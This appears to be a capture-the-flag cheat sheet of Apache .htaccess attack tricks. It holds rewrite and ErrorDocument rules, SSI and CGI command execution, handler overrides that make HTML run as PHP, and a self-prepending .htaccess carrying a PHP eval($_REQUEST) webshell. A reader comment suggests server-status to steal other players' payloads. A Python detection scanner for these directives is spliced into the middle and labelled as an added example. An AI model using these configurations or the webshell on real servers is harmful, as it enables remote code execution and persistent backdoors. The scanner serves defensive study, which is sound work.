o_o ....

.htaccess

rewrite

Options +FollowSymlinks

RewriteEngine on

RewriteRule lol.jpg /flag.txt [NC]

/flag.txt is resolved relative to the web root. This can be used to bypass routing restrictions or as a backdoor.

SSI

.htaccess

AddType text/html .shtml
AddHandler server-parsed .shtml
Options Includes

1.shtml

<pre>
<!--#exec cmd="whoami" -->
</pre>

cgi

.htaccess

Options ExecCGI
SetHandler cgi-script

whoami.cgi(linux)

#!/bin/sh
whoami

calc.cgi(windows)

#!C:\Windows\System32\calc.exe
1

ErrorHandlerfile

This path is likewise relative to the web root. It can also be set to a dynamic file, such as shell.php, to act as a backdoor.

ErrorDocument 404 /flag    

handler

Set the parsing rules

<Files index.html>
ForceType application/x-httpd-php
SetHandler application/x-httpd-php
</Files>


Self-inclusion

Requesting any PHP file is enough

php_value auto_prepend_fi\
le .htaccess
#<?php eval($_REQUEST['evoA'])?>
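A defensive check for upload or user-writable directories, as an added example that is not part of the original post: it joins backslash-continued lines the way Apache does before matching, so the split `auto_prepend_fi\` / `le` directive above is still caught where a line-by-line keyword filter misses it. The rule labels, function names and the sample file are constructed for illustration.

```python
import re

# Constructed rule set: label -> pattern, applied to one logical directive line.
RULES = [
    ("handler-override", re.compile(
        r"^\s*(SetHandler|AddHandler|ForceType)\s+\S*"
        r"(cgi-script|server-parsed|server-status|x-httpd-php)", re.I)),
    ("exec-options", re.compile(r"^\s*Options\b.*\b(ExecCGI|Includes)\b", re.I)),
    ("php-prepend", re.compile(r"^\s*php_value\s+auto_(prepend|append)_file\b", re.I)),
    ("error-document", re.compile(r"^\s*ErrorDocument\s+\d{3}\s+/", re.I)),
    # PHP hidden in an Apache comment still runs once the file is included.
    ("embedded-php", re.compile(r"<\?(php|=)", re.I)),
]

def logical_lines(text):
    """Yield (first_line_no, joined_line), merging lines that end in a backslash."""
    buf, start = "", None
    for no, raw in enumerate(text.splitlines(), 1):
        if start is None:
            start = no
        if raw.endswith("\\"):      # continuation: drop the backslash, keep reading
            buf += raw[:-1]
            continue
        yield start, buf + raw
        buf, start = "", None
    if start is not None:           # file ended in the middle of a continuation
        yield start, buf

def scan(text):
    """Return [(line_no, rule_label), ...] for every rule hit in a .htaccess body."""
    return [(no, label)
            for no, line in logical_lines(text)
            for label, pat in RULES if pat.search(line)]

# Constructed sample that mirrors the directives shown on this page.
SAMPLE = (
    "Options +FollowSymlinks\n"
    "php_value auto_prepend_fi\\\n"
    "le .htaccess\n"
    "#<?php echo 'constructed marker'; ?>\n"
    "<Files index.html>\n"
    "ForceType application/x-httpd-php\n"
    "</Files>\n"
    "Options ExecCGI\n"
)

if __name__ == "__main__":
    for no, label in scan(SAMPLE):
        print(f"line {no}: {label}")
```
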

Access permissions

<Files ~ "^flag.txt$">
Order deny,allow
Allow from all
</Files>
# Access allowed

<Files ~ "^flag.txt$">
Order allow,deny
Deny from all
</Files>
# Access denied

PHP engine

# Enable PHP parsing
php_flag engine On
# or
php_flag engine 1

# Disable PHP parsing
php_flag engine Off
# or
php_flag engine 0

# This does not seem to be able to override an engine setting made in a Directory directive in apache2.conf

Directives that are not allowed in .htaccess files (partial list)

Alias

<Directory >
</Directory>


Comment

  1. AFKL
    Firefox 83

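    Here's one I use a lot (not really)
    ```
    SetHandler server-status
    ```
    It returns the server status.
    If the target is not a dynamic instance, you may be able to pick up other players' payloads for free
    (good kids shouldn't copy this)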

  2. kodosan
    Chrome 87

    Thanks for sharing!
